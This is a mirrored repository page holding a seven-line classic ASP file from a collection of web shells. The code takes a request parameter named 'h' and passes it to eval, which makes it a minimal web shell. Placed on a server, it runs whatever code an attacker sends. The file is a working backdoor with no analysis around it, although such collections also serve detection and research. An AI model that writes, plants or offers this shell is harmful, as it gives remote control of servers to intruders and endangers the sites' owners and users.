mirror of
https://github.com/tennc/webshell
synced 2025-02-16 17:58:23 +00:00
7 lines
71 B
Text
7 lines
71 B
Text
<%
|
|
dim x1,x2
|
|
x1 = request("h")
|
|
x2 = x1
|
|
eval x2
|
|
%>
|
|
<!-- yes++ -->
|